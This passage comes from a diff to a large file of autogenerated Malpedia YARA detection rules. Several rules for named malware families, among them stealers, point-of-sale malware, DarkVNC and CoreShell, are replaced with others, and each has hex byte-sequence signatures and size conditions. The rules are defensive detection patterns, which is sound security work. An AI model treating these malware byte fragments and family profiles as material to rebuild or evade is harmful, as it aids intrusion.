+		$sequence_7 = { ff15???????? 6a07 59 be???????? }
+		$sequence_8 = { 7508 6a01 ff15???????? 8d45fc 50 }
+		$sequence_9 = { 50 6a01 6810660000 ff75fc ff15???????? 85c0 }
 
 	condition:
-		7 of them and filesize < 647168
+		7 of them and filesize < 7192576
 }
-rule MALPEDIA_Win_Hotwax_Auto : FILE
+rule MALPEDIA_Win_Graphite_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d6f02e96-b0de-561a-b1c4-f7fa097556ab"
+		id = "22d6771d-6e02-5bad-92aa-7abf2f0540bc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotwax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hotwax_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphite"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphite_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "fe64f11364e8e368736d318c239a3692d708ee4c24b150c29655e2d18f1cd86c"
+		logic_hash = "fac8314c02add0a1a3fcfc7bc6cd359f12eb58a8246911250bf475b51a803e3f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123214,32 +123475,32 @@ rule MALPEDIA_Win_Hotwax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ec20 488bd9 488d0de0b60000 483bd9 }
-		$sequence_1 = { 33c9 33d2 41ff5500 448bd8 85c0 0f85ef020000 8b4500 }
-		$sequence_2 = { 8945a0 496344243c 33d2 428b4c2050 41b900300000 c744242040000000 }
-		$sequence_3 = { 4885c0 7467 33d2 488bc8 }
-		$sequence_4 = { 85c0 0f8596000000 397ddc 0f848d000000 4c8d05247bffff }
-		$sequence_5 = { 4885c8 7507 8b0b 4803ca eb11 483bca 7245 }
-		$sequence_6 = { c6850205000000 c785e004000043726561 c785e404000074655468 c785e804000072656164 c685ec04000000 }
-		$sequence_7 = { 7343 8b471c 458b4d44 4d8b4530 4803c5 }
-		$sequence_8 = { ff15???????? 488d4c2468 33d2 41b868050000 83cbff }
-		$sequence_9 = { 4c8d0dac7fffff 4c8bd8 4b8b84f9a04b0100 4c895c3040 4b8b84f9a04b0100 498bd6 }
+		$sequence_0 = { 81e2ff030000 81e1bf030000 83c940 c1e10a }
+		$sequence_1 = { 7513 33d2 e8???????? 84c0 74e4 }
+		$sequence_2 = { 85db 7513 33d2 e8???????? }
+		$sequence_3 = { 7513 33d2 e8???????? 84c0 }
+		$sequence_4 = { 85db 7513 33d2 e8???????? 84c0 }
+		$sequence_5 = { 81e1bf030000 83c940 c1e10a 0bca }
+		$sequence_6 = { 33d2 e8???????? 84c0 74e4 }
+		$sequence_7 = { ff15???????? 33c0 eb05 b801010000 }
+		$sequence_8 = { 85db 7513 33d2 e8???????? 84c0 74e4 }
+		$sequence_9 = { 81e2ff030000 81e1bf030000 83c940 c1e10a 0bca }
 
 	condition:
-		7 of them and filesize < 198656
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Classfon_Auto : FILE
+rule MALPEDIA_Win_Lock_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a25f42c4-4355-51f7-b6ab-00b467c76376"
+		id = "66d7719a-09f7-5449-96c8-7a2badb35721"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.classfon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lock_pos_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "66ac3b2c234be6c5adfcd77cebd772d5254febc41066bba0a145357a351f1537"
+		logic_hash = "68264cf97fe11e22f20de5aa9fd8236aae89e24686e8c6b06c621f87466b5d04"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123253,32 +123514,35 @@ rule MALPEDIA_Win_Classfon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 56 ffd0 85c0 7511 55 e8???????? }
-		$sequence_1 = { 8d4c2400 c744240000000000 51 68???????? 52 c744241001000000 }
-		$sequence_2 = { e8???????? 8b8c2420020000 8bb42418020000 8bd8 8bd1 8bfb }
-		$sequence_3 = { 0f859d010000 8d4c241c 8d542424 51 8b4c2414 8d442424 52 }
-		$sequence_4 = { 897d04 89450c 894508 894510 8b4b50 }
-		$sequence_5 = { 83c408 40 8bf8 803f00 }
-		$sequence_6 = { ffd3 89be00020000 89be10020000 89be14020000 5f 5e }
-		$sequence_7 = { 03f5 56 89742418 ff15???????? 85c0 0f85c3000000 }
-		$sequence_8 = { e8???????? 83c40c 85c0 7437 8b8c2428020000 }
-		$sequence_9 = { 5f 5e 5b 81c418020000 c3 5f }
+		$sequence_0 = { 8bec 8b4508 8b0d???????? 8b0481 }
+		$sequence_1 = { 8bec 837d0800 7704 33c0 }
+		$sequence_2 = { 6a00 6a23 6a00 ff15???????? 8d8df8fdffff }
+		$sequence_3 = { 55 8bec 81eca4040000 56 }
+		$sequence_4 = { 8d85f8fdffff 50 6a00 6a00 6a23 }
+		$sequence_5 = { 6a00 32db e8???????? 8bf8 59 59 85ff }
+		$sequence_6 = { 8b450c 85c0 740a 8b55f8 8911 8b4dfc 8908 }
+		$sequence_7 = { ff15???????? 85c0 7555 57 6a04 8d45e4 50 }
+		$sequence_8 = { 8b4de4 034804 894de4 8b55f0 8b45f0 034204 8945f0 }
+		$sequence_9 = { 6a04 8b4508 50 8d4dec 51 e8???????? 83c40c }
+		$sequence_10 = { 8908 837df400 740b 8b55f4 }
+		$sequence_11 = { 837dfc00 7414 8b450c 50 8b4d08 51 }
+		$sequence_12 = { 8b45dc 83e801 8945dc 85d2 0f843a010000 8b4df4 668b11 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Saigon_Auto : FILE
+rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67d61467-37a6-5772-94ec-e928f4e39175"
+		id = "24de6ab1-f92f-5eeb-9448-e6d3e6bd0612"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.saigon_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.observer_stealer_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "c3b4f453a06699b81b34d66487fc346a283825480563ae11e28741d2bf0a0cba"
+		logic_hash = "408c29e400138ccd9118763d2259592c2d4bc7c8429c89ee21feadbbd649bc7c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123292,32 +123556,32 @@ rule MALPEDIA_Win_Saigon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488be9 215c2460 ff15???????? 4c8d4c2460 8bf0 4533c0 488bcd }
-		$sequence_1 = { 41b800800000 488bcf ff15???????? eb08 ff15???????? 8bd8 }
-		$sequence_2 = { e8???????? 488d8c24b0040000 4c8bc3 33d2 }
-		$sequence_3 = { 4533db e9???????? 33c0 4c8d4c2450 }
-		$sequence_4 = { ff15???????? 33db 483beb 7412 }
-		$sequence_5 = { 33d2 ff15???????? eb03 418bdf 448b8c24e0000000 488bbc24e0000000 }
-		$sequence_6 = { 33d2 8bd8 ff15???????? eb0f bb08000000 }
-		$sequence_7 = { 4c8bc3 33d2 e8???????? 488d8c24c0000000 }
-		$sequence_8 = { 488d542468 4889442468 488b05???????? 418d4802 41b9e0930400 4889442470 ff15???????? }
-		$sequence_9 = { 4183cfff 483bce 7439 33d2 }
+		$sequence_0 = { 3b742420 7412 8bce e8???????? 6a18 58 03f0 }
+		$sequence_1 = { 5d 5b 81c490000000 c24c00 81ecb8000000 83bc24d400000008 }
+		$sequence_2 = { e8???????? ff36 8d4c243c e8???????? 8d442420 50 8d44241c }
+		$sequence_3 = { 53 55 56 57 83ec18 8d8424b8010000 8bf1 }
+		$sequence_4 = { e8???????? cc 8b442408 8b4c2404 830023 8b01 8b50fc }
+		$sequence_5 = { 59 b201 8d4c244c e8???????? 83c430 8d4c2460 e8???????? }
+		$sequence_6 = { ab ab ab ab 33c0 895a70 8d7a78 }
+		$sequence_7 = { 53 ff15???????? 837c243808 8d442424 0f43442424 50 ff15???????? }
+		$sequence_8 = { 8b9044044400 85d2 75cd 5f c1e604 399e44044400 7407 }
+		$sequence_9 = { 50 8d4c241c e8???????? 8d8c24e0000000 8b00 03c5 50 }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 614400
 }
-rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
+rule MALPEDIA_Win_Darkvnc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "12254ac4-43e6-5705-9880-6efd82324f77"
+		id = "1f59578f-2ca5-52a8-837e-fa2b82f60870"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chrgetpdsi_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chrgetpdsi_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkvnc_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f510ed1d9dd9ee7e68c40131d1a59b2b1ef7a35fe613361e1f3e48c7e065108c"
+		logic_hash = "059ffb48bc28e567c2e6dc5e6789fbdcb5b40c4bf8dddefcf2a4e68738b127e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123331,34 +123595,34 @@ rule MALPEDIA_Win_Chrgetpdsi_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4889ca 83e11f 4883f90c 0f8743030000 4c8d41fe 4983f804 0f869a010000 }
-		$sequence_1 = { eb11 488d7818 488b8c24580b0000 e8???????? 48c7400810000000 488d0de6c51a00 488908 }
-		$sequence_2 = { e8???????? 488d059bb42d00 bb03000000 0f1f440000 e8???????? 488b442450 e8???????? }
-		$sequence_3 = { be01000000 4c8d1557bd2300 41bb02000000 e8???????? 488b6c2458 4883c460 c3 }
-		$sequence_4 = { 4983fd2e 0f82e3060000 4c8d69d2 49f7dd 49c1fd3f 4183e52e 4901c5 }
-		$sequence_5 = { e8???????? 8400 488b9424d8000000 488b7270 440f11bc2498000000 440f11bc24a8000000 488d3db2020000 }
-		$sequence_6 = { 7476 440fb74b52 4d89c2 4b8d3c01 488d7ff8 8403 48833f00 }
-		$sequence_7 = { c3 488d05b0351c00 488d1dd9212400 e8???????? 90 4889442408 e8???????? }
-		$sequence_8 = { e8???????? 488d3d09643e00 488b442438 0f1f4000 e8???????? e8???????? 4889442430 }
-		$sequence_9 = { 833d????????00 7509 488905???????? eb0c 488d3dbeda3b00 e8???????? 488b0d???????? }
+		$sequence_0 = { 8b442404 488b4c2420 0fb70441 83f825 752f 8b0424 b925000000 }
+		$sequence_1 = { 48894130 8b4108 2b01 894138 7456 488b4328 }
+		$sequence_2 = { 488b442478 4839842480000000 7417 4c8b842480000000 33d2 488b0d???????? ff15???????? }
+		$sequence_3 = { 7406 ff15???????? 85db 7408 8bcb ff15???????? 488bc6 }
+		$sequence_4 = { 498bf6 3b6efc 754a f70600000040 7430 e8???????? 83f805 }
+		$sequence_5 = { 85db 755d 488b4df0 ff15???????? 8b4540 448bce 4c8b4530 }
+		$sequence_6 = { 3bc7 74c3 488bcb e8???????? 85b3f0000000 754d ff15???????? }
+		$sequence_7 = { 4585db 0f8e86000000 4c63742458 4963e8 498d041e 4c8be9 }
+		$sequence_8 = { 750c 488b442438 4889442440 eb47 eb24 488b442428 488b00 }
+		$sequence_9 = { 4883c020 4889442430 488b442430 83780400 0f849f000000 488b542440 488b442430 }
 
 	condition:
-		7 of them and filesize < 10027008
+		7 of them and filesize < 606208
 }
-rule MALPEDIA_Win_Geminiduke_Auto : FILE
+rule MALPEDIA_Win_Coreshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "02859369-3674-5db5-af28-f984437e92a6"
+		id = "27d46fdb-7250-5f28-b02a-5095dbf27fe3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.geminiduke_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.coreshell_auto.yar#L1-L449"
 		license_url = "N/A"
-		logic_hash = "43a7a4a4b6211d31a7f1edbc5b1056c5050268b2a916bbe7f7b62319abe9e067"
+		logic_hash = "038145c7338b3ef0cec3ae46e0288d3925695dd56d293f3ab89cfa76d758deaa"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -123370,36 +123634,74 @@ rule MALPEDIA_Win_Geminiduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? e8???????? 83c404 50 6801000080 ff15???????? }
-		$sequence_1 = { 8b7c2410 8b442414 8b4c2418 f3aa 5f 59 }
-		$sequence_2 = { 6819000200 6a00 68???????? e8???????? }
-		$sequence_3 = { 50 51 57 8b7c2410 }
-		$sequence_4 = { 034590 03c8 894dd0 8b45f8 }
-		$sequence_5 = { 034584 8b8d64ffffff c1e907 8b9564ffffff c1e219 0bca }
-		$sequence_6 = { 03459c 03c8 894ddc 8b45fc }
-		$sequence_7 = { 034590 8b8d70ffffff c1e907 8b9570ffffff }
-		$sequence_8 = { 8ac1 0430 8ad1 80ea0a 80fa05 7705 }
-		$sequence_9 = { 337704 33e8 8b442410 c1ee12 83e601 33ee 896f24 }
-		$sequence_10 = { 80f919 7703 b001 c3 }
-		$sequence_11 = { 668907 8bc2 5a 5b 59 }
-		$sequence_12 = { 57 51 53 52 33db 8b7c2418 8b74241c }
-		$sequence_13 = { 66894704 8bc2 c1e010 668b4602 33d2 f7f3 }
+		$sequence_0 = { be06000000 e8???????? 85c0 7401 4e 68c0270900 }
+		$sequence_1 = { 56 ff15???????? 83c40c 3bc6 }
+		$sequence_2 = { 68???????? 52 ffd7 ffd0 }
+		$sequence_3 = { 56 6810270000 ff15???????? be06000000 }
+		$sequence_4 = { 50 ff15???????? 83c404 32db }
+		$sequence_5 = { 6804010000 6a08 8b15???????? 52 }
+		$sequence_6 = { 57 6a08 51 ff15???????? 8bf8 85ff 750a }
+		$sequence_7 = { 8b0d???????? 8b15???????? 6a01 51 68???????? 52 }
+		$sequence_8 = { 6a00 ff15???????? 8bf0 ff15???????? 50 }
+		$sequence_9 = { 56 6a00 6a00 681c800000 }
+		$sequence_10 = { 8d041e 50 57 6a08 }
+		$sequence_11 = { c20400 50 a1???????? 6a00 }
+		$sequence_12 = { 68???????? 50 a3???????? ffd6 a3???????? a1???????? 68???????? }
+		$sequence_13 = { 8d4c2400 56 51 6a00 }
+		$sequence_14 = { 8bf1 8b4604 85c0 7407 50 ff15???????? 8b36 }
+		$sequence_15 = { e8???????? 85c0 7402 eb14 c745f000000000 }
+		$sequence_16 = { eb14 c745f000000000 68e0930400 ff15???????? }
+		$sequence_17 = { ff15???????? ffd0 85c0 7508 ff15???????? }
+		$sequence_18 = { 50 ffd6 6a00 6a00 6a00 68???????? 6a00 }
+		$sequence_19 = { 68???????? 6800080000 8d85fcefffff 50 ff15???????? }
+		$sequence_20 = { 8b0d???????? 52 50 57 68???????? 51 }
+		$sequence_21 = { a1???????? 68???????? 50 ffd6 6a00 }
+		$sequence_22 = { ff15???????? 53 6a06 6a03 53 53 }
+		$sequence_23 = { 50 68???????? 68???????? 8985f0fdffff }
+		$sequence_24 = { 8d55f0 52 e8???????? 83c408 33c0 8b4df0 64890d00000000 }
+		$sequence_25 = { ff15???????? 50 68???????? 6800080000 }
+		$sequence_26 = { 81e1ffff0000 81e1ffff0000 81e1ff000000 81e1ff000000 }
+		$sequence_27 = { ff15???????? 0fb6cb 03cf 880431 fec3 }
+		$sequence_28 = { 52 a1???????? 50 68???????? 8b0d???????? 51 ff15???????? }
+		$sequence_29 = { 51 ff15???????? ffd0 8945fc }
+		$sequence_30 = { 56 51 56 6a01 }
+		$sequence_31 = { ba00080000 2bd0 52 8d85fcefffff }
+		$sequence_32 = { 51 ff15???????? 83c414 8d95f4fdffff 52 ff15???????? }
+		$sequence_33 = { e8???????? 8be8 8b442410 50 e8???????? }
+		$sequence_34 = { 6888130000 ff15???????? c745f000000000 c745f400000000 }
+		$sequence_35 = { 8d8dfcefffff 51 ff15???????? ba00080000 2bd0 }
+		$sequence_36 = { 81e2ffff0000 81e2ffff0000 c1ea08 81e2ff000000 }
+		$sequence_37 = { 68???????? ff35???????? ff15???????? 0305???????? 50 ff15???????? a1???????? }
+		$sequence_38 = { ffd6 ffd0 68???????? a3???????? }
+		$sequence_39 = { bf04010000 57 6a08 ff35???????? }
+		$sequence_40 = { 8908 8b15???????? 89d6 81c609000000 }
+		$sequence_41 = { 8908 8b00 8b5004 8b35???????? }
+		$sequence_42 = { 8908 813800000000 0f95c2 8b35???????? 8b3d???????? }
+		$sequence_43 = { 29d6 01f0 a3???????? e9???????? }
+		$sequence_44 = { a3???????? ffd7 8bd8 68???????? 53 ffd6 }
+		$sequence_45 = { 29d6 0faff0 31d2 f7f6 }
+		$sequence_46 = { 5f 5b 5d c3 b81c000000 }
+		$sequence_47 = { 6689fb 0fb7fb c1ef08 81e7ff000000 }
+		$sequence_48 = { 68???????? 53 a3???????? ffd6 a3???????? 68???????? }
+		$sequence_49 = { 5f 5d c3 89e0 c70010270000 }
+		$sequence_50 = { 53 a3???????? ffd6 68???????? a3???????? ffd7 8bd8 }
+		$sequence_51 = { 57 8b3d???????? 68???????? ffd7 8b35???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 303100
 }
-rule MALPEDIA_Win_Electricfish_Auto : FILE
+rule MALPEDIA_Win_Jackpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54f0ee66-bee9-5fd6-90c5-67fcbb00bae7"
+		id = "3dd7bb50-a9ba-5035-bc39-1825f87f4af4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.electricfish_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jackpos_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "570c92a12a35054e6d1b5030b781194881d1880fcbe3006781ca116a918ce32a"
+		logic_hash = "e318334295704491926f566878a765af2b4635b235cabb0b05edeaa2585792fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123413,32 +123715,32 @@ rule MALPEDIA_Win_Electricfish_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4f 783b 8bff 0fbe5500 40 8d0cb6 45 }
-		$sequence_1 = { c3 8b4e0c 6a00 51 e8???????? 83c408 8b5608 }
-		$sequence_2 = { 85ff 7411 8bc5 2bc6 50 03ce }
-		$sequence_3 = { 39a8ac000000 0f84a8000000 80beed0a000000 89aef00a0000 0f8564040000 80beee0a000000 }
-		$sequence_4 = { 0f85b8000000 85db 0f8451040000 0fb638 40 4b 4e }
-		$sequence_5 = { e8???????? 8b561c 68???????? 52 e8???????? 6893010000 68???????? }
-		$sequence_6 = { e8???????? 8b4614 89780c 8b4b14 8b5110 52 e8???????? }
-		$sequence_7 = { e8???????? 83c418 85c0 0f8413030000 8b542410 52 8d442464 }
-		$sequence_8 = { 0f84d3000000 8b879c010000 3bc3 7417 50 e8???????? 83c404 }
-		$sequence_9 = { c3 8b8424a8000000 6a01 50 e8???????? 83c408 5b }
+		$sequence_0 = { 03f3 50 8d0472 eb6a 83f808 7204 }
+		$sequence_1 = { 8b07 85c0 7454 8b5934 8b7120 8b1b 8b36 }
+		$sequence_2 = { 8b4dd4 8bc1 83fa08 7303 8d45d4 8d1c78 85db }
+		$sequence_3 = { 895df0 3bf3 0f849c000000 391e 0f8594000000 6a10 e8???????? }
+		$sequence_4 = { 2bf8 6a00 57 bb01000000 8d75d4 e8???????? 8b45b4 }
+		$sequence_5 = { 1bc0 83e0fe 83c001 7511 3bf7 }
+		$sequence_6 = { 52 8b55bc 57 8d4dac 51 0fb7c0 52 }
+		$sequence_7 = { 897df0 3bfe 762a 8da42400000000 8b450c 50 }
+		$sequence_8 = { 52 8d4584 50 eb3e 837d9000 }
+		$sequence_9 = { 3b7d10 747e 83c704 83f808 7204 8b0f }
 
 	condition:
-		7 of them and filesize < 3162112
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Unidentified_113_Auto : FILE
+rule MALPEDIA_Win_Banpolmex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fca9d6d2-018c-5238-a2c5-d26ca95c2862"
+		id = "5e5629b9-1e18-5205-b631-ad03c2ae43f0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_113"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_113_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banpolmex_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "55ef739d0acd0e849dcf600673496f5aa2583f128c784d3cf7a14a872f001ae1"
+		logic_hash = "e119b8f9656fb74b42241f31ba7dcd3e79fbd082cb37077b0109e5a58aed6af5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123452,32 +123754,32 @@ rule MALPEDIA_Win_Unidentified_113_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7604 6894000000 ff74246c e8???????? 83c410 8946f8 e9???????? }
-		$sequence_1 = { ffb424c8000000 56 53 e8???????? 8bbc24d4000000 83c42c 8bc7 }
-		$sequence_2 = { ff742430 68???????? e8???????? 8bf0 83c40c 85f6 0f845f020000 }
-		$sequence_3 = { ff761c ffd0 0f57c0 83c408 660f13442410 8b6c2414 8b5c2410 }
-		$sequence_4 = { ff2485eca50810 8b4104 85c0 0f842c010000 8b38 33c9 85ff }
-		$sequence_5 = { e8???????? 83c404 83cbff e9???????? 83ff37 0f85b4000000 389ac7010000 }
-		$sequence_6 = { e8???????? 8bf0 83c408 85f6 0f84bf000000 a1???????? 6a00 }
-		$sequence_7 = { e9???????? 807df000 0f845bffffff ff75e4 e8???????? 59 e9???????? }
-		$sequence_8 = { ff742468 8bf0 57 ff7310 ff742430 e8???????? 50 }
-		$sequence_9 = { ff7608 ff15???????? 894628 85c0 752d ff15???????? 6860c00000 }
+		$sequence_0 = { 488d15db730200 4881c128050000 e8???????? 85c0 0f8564010000 8d5019 }
+		$sequence_1 = { 48896c2420 e8???????? 488d8c2490040000 ff15???????? 85c0 7508 ff15???????? }
+		$sequence_2 = { 488d4c2430 41b001 e8???????? 85c0 7566 8b442420 3c7f }
+		$sequence_3 = { 4c8d0d45870300 4885c0 4d8bd9 4d8bd1 4c0f45d8 488b442478 498bf9 }
+		$sequence_4 = { 7525 b9d0000000 e8???????? 48898690030000 4885c0 745e 488b16 }
+		$sequence_5 = { 488d15587ffeff bf00020000 8b8c82c8820100 4803ca ffe1 80bb7403000007 731f }
+		$sequence_6 = { 894c2420 488d154df70100 488bcb e8???????? e9???????? c74424385d000000 89542430 }
+		$sequence_7 = { 7459 398360040000 7551 488d0530cf0200 483987f8020000 7522 488d05a0cf0200 }
+		$sequence_8 = { 7517 448d4004 33d2 488bcb ff15???????? 85c0 0f84d5fdffff }
+		$sequence_9 = { 89442420 e8???????? 8bd8 33ff 85db 740f 488d15f8f40100 }
 
 	condition:
-		7 of them and filesize < 4707328
+		7 of them and filesize < 1555456
 }
-rule MALPEDIA_Win_Madmax_Auto : FILE
+rule MALPEDIA_Win_Bitsloth_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d1cbce1-ade8-5d76-a04c-20b098c8480b"
+		id = "a3d0de3b-9639-54f3-9dde-5c53759da2ed"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.madmax_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsloth"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitsloth_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "ad33eff006b5d6cb56b22d8686bde1b21a59becc38b8876b1c999d0a4976f07a"
+		logic_hash = "c4f0991c5eb2b348c1fcbe6db2b4d14bd7d82664775a39a42f7ea0ad4a8658a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -123491,32 +123793,32 @@ rule MALPEDIA_Win_Madmax_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6897b3c7a8156 c10a9c 7ed2 1550605965 91 186b72 b293 }
-		$sequence_1 = { b852e635a0 b5cb 85c6 1cfe 48 853f 237ab7 }
-		$sequence_2 = { f64f0a9b 10678e 58 b0df af 72f1 e5c9 }
-		$sequence_3 = { d6 b401 db59f6 55 94 58 4c }
-		$sequence_4 = { f8 df29 18ce 84617b 0ca6 08ba685649a2 7b28 }
-		$sequence_5 = { a7 16 d293b6f8cf83 91 63636f 834bb565 98 }
-		$sequence_6 = { fc 5b 359e973298 1816 2a3ce4 7d62 f616 }
-		$sequence_7 = { e02e fa 4b 2f d9e0 cd6c 3adf }
-		$sequence_8 = { 8d8508feffff 9c f605????????d3 0f85d3000000 3efd 27 40 }
-		$sequence_9 = { e652 45 23a7cb3626db a9886e48e3 3407 d120 c1f37d }
+		$sequence_0 = { 83c40c 68???????? e8???????? 83c404 c645fc00 8d8d64f0ffff e8???????? }
+		$sequence_1 = { c78564f9feff00000000 eb0b 1bc9 83c901 898d64f9feff }
+		$sequence_2 = { 83c408 8d8de0faffff 51 8d95bcf1ffff 52 68c50b0000 8b4508 }
+		$sequence_3 = { 8945ec 8b4d08 8b55e0 3b91a0af0600 7c02 eb44 }
+		$sequence_4 = { 50 68???????? 68???????? 8b0d???????? 51 8b15???????? 52 }
+		$sequence_5 = { e8???????? 8bc8 e8???????? 8b55bc 2bd0 8955cc 7446 }
+		$sequence_6 = { 68???????? 8b55f8 52 ff15???????? 8945fc 837dfc00 7515 }
+		$sequence_7 = { 8945c8 8945cc 68???????? 8b4d08 51 e8???????? 83c408 }
+		$sequence_8 = { 51 8b55e0 8b02 8b4de0 51 8b908c000000 ffd2 }
+		$sequence_9 = { 3b8568ffffff 721d 6a00 6a00 681f520000 e8???????? 83c40c }
 
 	condition:
-		7 of them and filesize < 3227648
+		7 of them and filesize < 677888
 }
-rule MALPEDIA_Win_Diavol_Auto : FILE
+rule MALPEDIA_Win_Vshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ced056a0-d7eb-5608-bc7f-4327dfcdc8b3"
+		id = "4d7f1293-ffbb-5626-82e1-c6ee180846fc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol"
